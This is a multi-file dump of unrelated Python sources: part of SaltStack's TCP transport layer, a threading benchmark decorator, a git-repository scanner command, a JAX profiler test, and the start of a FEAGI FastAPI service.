# pylint: enable=W1701
@salt.ext.tornado.gen.coroutine
def connect(self, publish_port, connect_callback=None, disconnect_callback=None):
self.publish_port = publish_port
self.message_client = MessageClient(
self.opts,
self.opts["master_ip"],
int(self.publish_port),
io_loop=self.io_loop,
connect_callback=connect_callback,
disconnect_callback=disconnect_callback,
source_ip=self.opts.get("source_ip"),
source_port=self.opts.get("source_publish_port"),
)
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
@salt.ext.tornado.gen.coroutine
def _decode_messages(self, messages):
if not isinstance(messages, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = salt.utils.msgpack.loads(messages)
body = salt.transport.frame.decode_embedded_strs(body)
else:
body = messages
raise salt.ext.tornado.gen.Return(body)
@salt.ext.tornado.gen.coroutine
def send(self, msg):
yield self.message_client._stream.write(msg)
def on_recv(self, callback):
"""
Register an on_recv callback
"""
return self.message_client.on_recv(callback)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class TCPReqServer(salt.transport.base.DaemonizedRequestServer):
"""
Tornado based TCP Request/Reply Server
:param dict opts: Salt master config options.
"""
# TODO: opts!
backlog = 5
def __init__(self, opts): # pylint: disable=W0231
self.opts = opts
self._socket = None
self.req_server = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise
if self.req_server is None:
# We only close the socket if we don't have a req_server instance.
# If we did, because the req_server is also handling this socket, when we call
# req_server.stop(), tornado will give us an AssertionError because it's trying to
# match the socket.fileno() (after close it's -1) to the fd it holds on it's _sockets cache
# so it can remove the socket from the IOLoop handlers
self._socket.close()
self._socket = None
if self.req_server is not None:
try:
self.req_server.close()
except OSError as exc:
if exc.errno != 9:
raise
log.exception(
"TCPReqServerChannel close generated an exception: %s", str(exc)
)
self.req_server = None
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def pre_fork(self, process_manager):
"""
Pre-fork we need to create the zmq router device
"""
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer,
args=(self.opts, self.socket_queue),
name="LoadBalancerServer",
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
def post_fork(self, message_handler, io_loop):
"""
After forking we need to create all of the local sockets to listen to the
router
message_handler: function to call with your payloads
"""
self.message_handler = message_handler
with salt.utils.asynchronous.current_ioloop(io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(
self.socket_queue,
self.handle_message,
ssl_options=self.opts.get("ssl"),
)
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind(
(self.opts["interface"], int(self.opts["ret_port"]))
)
self.req_server = SaltMessageServer(
self.handle_message,
ssl_options=self.opts.get("ssl"),
io_loop=io_loop,
)
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, payload, header=None):
payload = self.decode_payload(payload)
reply = yield self.message_handler(payload)
stream.write(salt.transport.frame.frame_msg(reply, header=header))
def decode_payload(self, payload):
return payload
class SaltMessageServer(salt.ext.tornado.tcpserver.TCPServer):
"""
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
"""
def __init__(self, message_handler, *args, **kwargs):
io_loop = (
kwargs.pop("io_loop", None) or salt.ext.tornado.ioloop.IOLoop.current()
)
self._closing = False
super().__init__(*args, **kwargs)
self.io_loop = io_loop
self.clients = []
self.message_handler = message_handler
@salt.ext.tornado.gen.coroutine
def handle_stream(self, stream, address):
"""
Handle incoming streams and add messages to the incoming queue
"""
log.trace("Req client %s connected", address)
self.clients.append((stream, address))
unpacker = salt.utils.msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
header = framed_msg["head"]
self.io_loop.spawn_callback(
self.message_handler, stream, framed_msg["body"], header
)
except salt.ext.tornado.iostream.StreamClosedError:
log.trace("req client disconnected %s", address)
self.remove_client((stream, address))
except Exception as e: # pylint: disable=broad-except
log.trace("other master-side exception: %s", e, exc_info=True)
self.remove_client((stream, address))
stream.close()
def remove_client(self, client):
try:
self.clients.remove(client)
except ValueError:
log.trace("Message server client was not in list to remove")
def shutdown(self):
"""
Shutdown the whole server
"""
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.shutdown() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
"""
Close the server
"""
if self._closing:
return
self._closing = True
for item in self.clients:
client, address = item
client.close()
self.remove_client(item)
try:
self.stop()
except OSError as exc:
if exc.errno != 9:
raise
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
"""
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
"""
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super().__init__(message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.stop() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
self._stop.set()
self.thread.join()
super().close()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'salt.ext.tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address
)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(salt.ext.tornado.tcpclient.TCPClient):
"""
Override _create_stream() in TCPClient to enable keep alive support.
"""
def __init__(self, opts, resolver=None):
self.opts = opts
super().__init__(resolver=resolver)
def _create_stream(
self, max_buffer_size, af, addr, **kwargs
): # pylint: disable=unused-argument,arguments-differ
"""
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
"""
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = salt.ext.tornado.iostream.IOStream(
sock, max_buffer_size=max_buffer_size
)
if salt.ext.tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class MessageClient:
"""
Low-level message sending client
"""
def __init__(
self,
opts,
host,
port,
io_loop=None,
resolver=None,
connect_callback=None,
disconnect_callback=None,
source_ip=None,
source_port=None,
):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or salt.ext.tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self._read_until_future = None
self._on_recv = None
self._closing = False
self._closed = False
self._connecting_future = salt.ext.tornado.concurrent.Future()
self._stream_return_running = False
self._stream = None
self.backoff = opts.get("tcp_reconnect_backoff", 1)
def _stop_io_loop(self):
if self.io_loop is not None:
self.io_loop.stop()
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
self.io_loop.add_timeout(1, self.check_close)
@salt.ext.tornado.gen.coroutine
def check_close(self):
if not self.send_future_map:
self._tcp_client.close()
self._stream = None
self._closing = False
self._closed = True
else:
self.io_loop.add_timeout(1, self.check_close)
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
@salt.ext.tornado.gen.coroutine
def getstream(self, **kwargs):
if self.source_ip or self.source_port:
kwargs = {
"source_ip": self.source_ip,
"source_port": self.source_port,
}
stream = None
while stream is None and not self._closed:
try:
stream = yield self._tcp_client.connect(
self.host, self.port, ssl_options=self.opts.get("ssl"), **kwargs
)
except Exception as exc: # pylint: disable=broad-except
log.warning(
"TCP Message Client encountered an exception while connecting to"
" %s:%s: %r, will reconnect in %d seconds",
self.host,
self.port,
exc,
self.backoff,
)
yield salt.ext.tornado.gen.sleep(self.backoff)
raise salt.ext.tornado.gen.Return(stream)
@salt.ext.tornado.gen.coroutine
def connect(self):
if self._stream is None:
self.stream = True
self._stream = yield self.getstream()
if not self._stream_return_running:
self.io_loop.spawn_callback(self._stream_return)
if self.connect_callback:
self.connect_callback(True)
@salt.ext.tornado.gen.coroutine
def _stream_return(self):
self._stream_return_running = True
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
wire_bytes = yield self._stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
header = framed_msg["head"]
body = framed_msg["body"]
message_id = header.get("mid")
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
# self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error(
"Got response for message_id %s that we are not"
" tracking",
message_id,
)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug(
"tcp stream to %s:%s closed, unable to recv",
self.host,
self.port,
)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing or self._closed:
return
if self.disconnect_callback:
self.disconnect_callback()
stream = self._stream
self._stream = None
if stream:
stream.close()
yield self.connect()
except TypeError:
# This is an invalid transport
if "detect_mode" in self.opts:
log.info(
"There was an error trying to use TCP transport; "
"attempting to fallback to another transport"
)
else:
raise SaltClientError
except Exception as e: # pylint: disable=broad-except
log.error("Exception parsing response", exc_info=True)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing or self._closed:
return
if self.disconnect_callback:
self.disconnect_callback()
stream = self._stream
self._stream = None
if stream:
stream.close()
yield self.connect()
self._stream_return_running = False
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception("Unable to find available messageid")
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
"""
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id, msg):
if message_id not in self.send_future_map:
return
future = self.send_future_map.pop(message_id)
if future is not None:
future.set_exception(SaltReqTimeoutError("Message timed out"))
@salt.ext.tornado.gen.coroutine
def send(self, msg, timeout=None, callback=None, raw=False):
if self._closing:
raise ClosingError()
message_id = self._message_id()
header = {"mid": message_id}
future = salt.ext.tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
self.io_loop.call_later(timeout, self.timeout_message, message_id, msg)
item = salt.transport.frame.frame_msg(msg, header=header)
yield self.connect()
yield self._stream.write(item)
recv = yield future
raise salt.ext.tornado.gen.Return(recv)
class Subscriber:
"""
Client object for use with the TCP publisher server
"""
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
class PubServer(salt.ext.tornado.tcpserver.TCPServer):
"""
TCP publisher
"""
def __init__(
self, opts, io_loop=None, presence_callback=None, remove_presence_callback=None
):
super().__init__(ssl_options=opts.get("ssl"))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.presence_events = False
if presence_callback:
self.presence_callback = presence_callback
else:
self.presence_callback = lambda subscriber, msg: msg
if remove_presence_callback:
self.remove_presence_callback = remove_presence_callback
else:
self.remove_presence_callback = lambda subscriber: subscriber
def close(self):
if self._closing:
return
self._closing = True
for client in self.clients:
client.stream.disconnect()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
@salt.ext.tornado.gen.coroutine
def _stream_read(self, client):
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
body = framed_msg["body"]
if self.presence_callback:
self.presence_callback(client, body)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug("tcp stream to %s closed, unable to recv", client.address)
client.close()
self.remove_presence_callback(client)
self.clients.discard(client)
break
except Exception as e: # pylint: disable=broad-except
log.error(
"Exception parsing response from %s", client.address, exc_info=True
)
continue
def handle_stream(self, stream, address):
log.debug("Subscriber at %s connected", address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@salt.ext.tornado.gen.coroutine
def publish_payload(self, package, topic_list=None):
log.trace("TCP PubServer sending payload: %s \n\n %r", package, topic_list)
payload = salt.transport.frame.frame_msg(package)
to_remove = []
if topic_list:
for topic in topic_list:
sent = False
for client in self.clients:
if topic == client.id_:
try:
# Write the packed str
yield client.stream.write(payload)
sent = True
# self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
if not sent:
log.debug("Publish target %s not connected %r", topic, self.clients)
else:
for client in self.clients:
try:
# Write the packed str
yield client.stream.write(payload)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug(
"Subscriber at %s has disconnected from publisher", client.address
)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace("TCP PubServer finished publishing payload")
class TCPPublishServer(salt.transport.base.DaemonizedPublishServer):
"""
Tornado based TCP PublishServer
"""
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.pub_sock = None
@property
def topic_support(self):
return not self.opts.get("order_masters", False)
def __setstate__(self, state):
self.__init__(state["opts"])
def __getstate__(self):
return {"opts": self.opts}
def publish_daemon(
self,
publish_payload,
presence_callback=None,
remove_presence_callback=None,
**kwargs
):
"""
Bind to the interface specified in the configuration file
"""
log_queue = kwargs.get("log_queue")
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get("log_queue_level")
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
io_loop = salt.ext.tornado.ioloop.IOLoop()
io_loop.make_current()
# Spin up the publisher
self.pub_server = pub_server = PubServer(
self.opts,
io_loop=io_loop,
presence_callback=presence_callback,
remove_presence_callback=remove_presence_callback,
)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts["interface"], int(self.opts["publish_port"])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
self.pub_server = pub_server
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri,
io_loop=io_loop,
payload_handler=publish_payload,
)
# Securely create socket
log.warn("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
io_loop.start()
except (KeyboardInterrupt, SystemExit):
pass
finally:
pull_sock.close()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
"""
process_manager.add_process(
self.publish_daemon, kwargs=kwargs, name=self.__class__.__name__
)
@salt.ext.tornado.gen.coroutine
def publish_payload(self, payload, *args):
ret = yield self.pub_server.publish_payload(payload, *args)
raise salt.ext.tornado.gen.Return(ret)
def publish(self, payload, **kwargs):
"""
Publish "load" to minions
"""
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
if not self.pub_sock:
self.pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient,
(pull_uri,),
loop_kwarg="io_loop",
)
self.pub_sock.connect()
self.pub_sock.send(payload)
def close(self):
if self.pub_sock:
self.pub_sock.close()
self.pub_sock = None
class TCPReqClient(salt.transport.base.RequestClient):
"""
Tornado based TCP RequestClient
"""
ttype = "tcp"
def __init__(self, opts, io_loop, **kwargs): # pylint: disable=W0231
self.opts = opts
self.io_loop = io_loop
parse = urllib.parse.urlparse(self.opts["master_uri"])
master_host, master_port = parse.netloc.rsplit(":", 1)
master_addr = (master_host, int(master_port))
# self.resolver = Resolver()
resolver = kwargs.get("resolver")
self.message_client = salt.transport.tcp.MessageClient(
opts,
master_host,
int(master_port),
io_loop=io_loop,
resolver=resolver,
source_ip=opts.get("source_ip"),
source_port=opts.get("source_ret_port"),
)
@salt.ext.tornado.gen.coroutine
def connect(self):
yield self.message_client.connect()
@salt.ext.tornado.gen.coroutine
def send(self, load, timeout=60):
ret = yield self.message_client.send(load, timeout=timeout)
raise salt.ext.tornado.gen.Return(ret)
def close(self):
self.message_client.close()
|
benchmark.py
|
import shelve
import sys
import threading
import time
class Benchmark(object):
def __init__(self, concurrency=10, iterations=10):
self.concurrency = concurrency
self.iterations = iterations
self.shelf = Shelf()
def __call__(self, f):
def wrapped(*args, **kwargs):
print 'Benchmarking %s...' % f.__name__,
sys.stdout.flush()
# build threads
threads = [threading.Thread(target=f, args=args, kwargs=kwargs)
for _ in range(self.concurrency)]
start = time.time()
for thread in threads:
thread.start()
while any(thread.is_alive() for thread in threads):
pass
end = time.time()
total_time = end - start
mean_time = total_time / (self.concurrency * self.iterations)
task_per_sec = (self.concurrency * self.iterations) / total_time
previous = self.shelf.get(f.__name__)
self.shelf.set(f.__name__, total_time)
if previous is not None:
percent_diff = 100.0 * (total_time - previous) / previous
print ('%2.3f seconds total (%+2.3f%%), %2.3f seconds per task, %2.3f tasks per second'
% (total_time, percent_diff, mean_time, task_per_sec))
else:
print ('%2.3f seconds total, %2.3f seconds per task, %2.3f tasks per second'
% (total_time, mean_time, task_per_sec))
return wrapped
class Shelf(object):
def __init__(self):
self.filename = '.keystoneworkout-benchmark-shelf'
def get(self, key):
shelf = shelve.open(self.filename)
try:
return shelf.get(key)
finally:
shelf.close()
def set(self, key, value):
shelf = shelve.open(self.filename)
try:
shelf[key] = value
finally:
shelf.close()
def delete(self, key):
shelf = shelve.open(self.filename)
try:
del shelf[key]
finally:
shelf.close()
|
scan.py
|
import click
import os
import fnmatch
import sys
import time
import threading
import git
import tmanager.core.messages.messages as msg
import tmanager.utilities.file_system as utl_fs
import tmanager.utilities.commands as utl_cmds
from tmanager.core.tool.repository.repository import Repository
@click.command(options_metavar="", short_help="Scan filesystem seeking repositories.")
@click.argument("root-dir", required=False, metavar="<root-dir>")
@click.pass_context
def scan(ctx: click.core.Context, root_dir: str) -> None:
"""
\b
Scan filesystem seeking repositories starting from <root-dir>.
If no <root-dir> is specified it will start scanning the system from your home directory.
\f
:param click.core.Context ctx: click context
:param str root_dir: directory to start scanning by searching repositories
:return: None
"""
# Get configuration object and verbose
cfg = utl_cmds.get_configs_from_context(ctx)
vrb = utl_cmds.get_verbose_from_context(ctx)
# Set initial variable value
root_dir = root_dir or utl_fs.get_home_env()
if not os.path.isdir(root_dir):
raise click.BadArgumentUsage(msg.Echoes.error("{} is not a directory".format(root_dir)))
msg.Prints.info("Using {} as root dir".format(root_dir))
msg.Prints.info("Scanning system for git repositories. This may take a while")
# Scan the system for git repositories
repos_list = []
msg.Prints.verbose("Start searching daemon", vrb)
search = threading.Thread(name='repo_search', target=_repo_seeker, args=(root_dir, repos_list))
search.daemon = True
search.start()
try:
while search.is_alive():
_animated_loading()
except KeyboardInterrupt:
msg.Prints.verbose("Searching deamon has been stopped", vrb)
msg.Prints.verbose(" Quitting...", vrb)
raise click.Abort()
# Delete "searching..." line
sys.stdout.write("\r")
msg.Prints.warning("{} repositories found".format(len(repos_list)))
# Found some repos?
if repos_list:
msg.Prints.verbose("Listing repositories", vrb)
# List repositories found
i = 0
for repo in repos_list:
name = repo.split("/")[-1]
msg.Prints.info("{}. {}, {}".format(i+1, name, repo))
i += 1
# Ask the user to add all repositories found
add_it_all = click.confirm(msg.Echoes.input("Do you want to add all of them?"), default=False)
# OK, add all repositories found to tman
if add_it_all:
msg.Prints.info("All repositories found will be added in tman")
msg.Prints.verbose("All repositories found are going to be added", vrb)
msg.Prints.verbose("Generating repositories indexes", vrb)
chosen_indexes = [*range(len(repos_list))]
# KO, ask to user which repository should be added
else:
msg.Prints.verbose("Do not add all repositories", vrb)
chosen_indexes = click.prompt(msg.Echoes.input("Enter the numbers of the repo you want to add, separated "
"by a comma"), default="q")
if chosen_indexes != "q":
msg.Prints.verbose("There are some repositories to add", vrb)
msg.Prints.verbose("Validate all user input indexes", vrb)
# Sanitize input
chosen_indexes = utl_cmds.sanitize_indexes(repos_list, chosen_indexes)
msg.Prints.verbose("Indexes sanitized: {}".format(chosen_indexes), vrb)
# If there are any indexes after index sanitize
if chosen_indexes:
msg.Prints.verbose("Listing all repositories user wants to add", vrb)
# Print the repositories that will be added
if vrb:
msg.Prints.warning("The following repositories will be added in tman:")
for i in chosen_indexes:
path = repos_list[i]
name = path.split("/")[-1]
msg.Prints.info("{}, {}".format(name, path))
else:
# There isn't any valid index, print error message and quit
msg.Prints.error("None of the supplied indexes is valid")
raise click.Abort()
# User choose to not add any repository
else:
msg.Prints.info("No repository will be add")
return
msg.Prints.verbose("Start to add desired repositories", vrb)
# Add selected repositories to tman
for i in chosen_indexes:
repo_dir = repos_list[i]
repo_name = repo_dir.split("/")[-1]
git_repo = git.Repo(repo_dir)
try:
repo_url = git_repo.remote("origin").url
except ValueError:
msg.Prints.warning("Skipping {}, no origin found".format(repo_name))
continue
add_time = time.time()
repository = Repository(repo_url, repo_dir, name=repo_name, add_date=add_time,
install_date=add_time, last_update_date=add_time)
msg.Prints.verbose("{} is going to be added".format(repository.__str__(True)), vrb)
if not any(t.get_name() == repository.get_name() for t in cfg.get_tools()):
cfg.add_tool(repository)
msg.Prints.success("{} successfully added".format(repository.get_name()))
else:
msg.Prints.warning("{} has already been added. Skipping...".format(repository.get_name()))
msg.Prints.verbose("All repositories have been added", vrb)
msg.Prints.verbose("Proceed to save new configurations", vrb)
cfg.save()
msg.Prints.verbose("Configurations saved", vrb)
msg.Prints.verbose("tman scan execution completed", vrb)
sys.exit(0)
def _repo_seeker(root_dir: str, repo_list: list) -> None:
"""
Search repositories from root_dir.
NOTE: THIS FUNCTION IS CALLED WITHIN A THREAD
:param str root_dir: root directory where to start the scan
:param list repo_list: repository list to populate
:return: None
"""
pattern = ".git"
for root, dirs, file in os.walk(root_dir):
for d in dirs:
if fnmatch.fnmatch(d, pattern):
repo_list.append(root)
def _animated_loading() -> None:
"""
Print a loading statement while searching for repositories.
:return: None
"""
chars = "/—\\|"
for char in chars:
sys.stdout.write("\r" + char + " searching...")
time.sleep(.1)
sys.stdout.flush()
|
profiler_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import glob
import os
import shutil
import threading
import unittest
from absl.testing import absltest
import jax
import jax.numpy as jnp
import jax.profiler
from jax.config import config
import jax.test_util as jtu
try:
import portpicker
except ImportError:
portpicker = None
try:
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as tf_profiler
except ImportError:
profiler_client = None
tf_profiler = None
config.parse_flags_with_absl()
class ProfilerTest(unittest.TestCase):
# These tests simply test that the profiler API does not crash; they do not
# check functional correctness.
def setUp(self):
super().setUp()
self.worker_start = threading.Event()
self.profile_done = False
@unittest.skipIf(not portpicker, "Test requires portpicker")
def testStartServer(self):
port = portpicker.pick_unused_port()
jax.profiler.start_server(port=port)
del port
def testTraceContext(self):
x = 3
with jax.profiler.TraceContext("mycontext"):
x = x + 2
def testTraceFunction(self):
@jax.profiler.trace_function
def f(x):
return x + 2
self.assertEqual(f(7), 9)
@partial(jax.profiler.trace_function, name="aname")
def g(x):
return x + 2
self.assertEqual(g(7), 9)
@partial(jax.profiler.trace_function, name="aname", akwarg="hello")
def h(x):
return x + 2
self.assertEqual(h(7), 9)
def testDeviceMemoryProfile(self):
x = jnp.ones((20,)) + 7.
self.assertIsInstance(jax.profiler.device_memory_profile(), bytes)
del x
def _check_xspace_pb_exist(self, logdir):
path = os.path.join(logdir, 'plugins', 'profile', '*', '*.xplane.pb')
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
@unittest.skipIf(not (portpicker and profiler_client and tf_profiler),
"Test requires tensorflow.profiler and portpicker")
def testSingleWorkerSamplingMode(self, delay_ms=None):
def on_worker(port, worker_start):
# Must keep return value `server` around.
server = jax.profiler.start_server(port) # noqa: F841
worker_start.set()
x = jnp.ones((1000, 1000))
while True:
with jax.profiler.TraceContext("atracecontext"):
jnp.dot(x, x.T).block_until_ready()
if self.profile_done:
break
def on_profile(port, logdir, worker_start):
worker_start.wait()
options = tf_profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=2,
device_tracer_level=1,
delay_ms=delay_ms,
)
# Request for 1000 milliseconds of profile.
duration_ms = 1000
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms,
'', 1000, options)
self.profile_done = True
logdir = absltest.get_default_test_tmpdir()
# Remove any existing log files.
shutil.rmtree(logdir, ignore_errors=True)
port = portpicker.pick_unused_port()
thread_profiler = threading.Thread(
target=on_profile, args=(port, logdir, self.worker_start))
thread_worker = threading.Thread(
target=on_worker, args=(port, self.worker_start))
thread_worker.start()
thread_profiler.start()
thread_profiler.join()
thread_worker.join(120)
self._check_xspace_pb_exist(logdir)
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
api.py
|
# Copyright 2016-2022 The FEAGI Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import requests
from fastapi import FastAPI, File, UploadFile
from fastapi.staticfiles import StaticFiles
from fastapi.middleware.cors import CORSMiddleware
from pydantic import BaseModel
from typing import Optional
from ast import literal_eval
from threading import Thread
from queue import Queue
from inf.feagi import *
from inf import disk_ops, runtime_data
from inf.baseline import gui_baseline
from inf.initialize import init_parameters
from evo import static_genome
init_parameters()
app = FastAPI()
favicon_path = 'favicon.svg'
api_queue = Queue()
ORIGINS = [
"http://localhost:6080",
"http://localhost:6081",
"http://localhost:3000"
]
app.add_middleware(
CORSMiddleware,
allow_origins=ORIGINS,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"]
)
class Launch(BaseModel):
existing_connectome: Optional[str] = ''
class Logs(BaseModel):
print_burst_info: Optional[bool]
print_messenger_logs: Optional[bool]
print_brain_gen_activities: Optional[bool]
class BurstEngine(BaseModel):
burst_duration: Optional[float]
class Network(BaseModel):
godot_host: Optional[str] = runtime_data.parameters['Sockets']['godot_host_name']
godot_data_port: Optional[int] = runtime_data.parameters['Sockets']['feagi_inbound_port_godot']
godot_web_port: Optional[int] = 6081
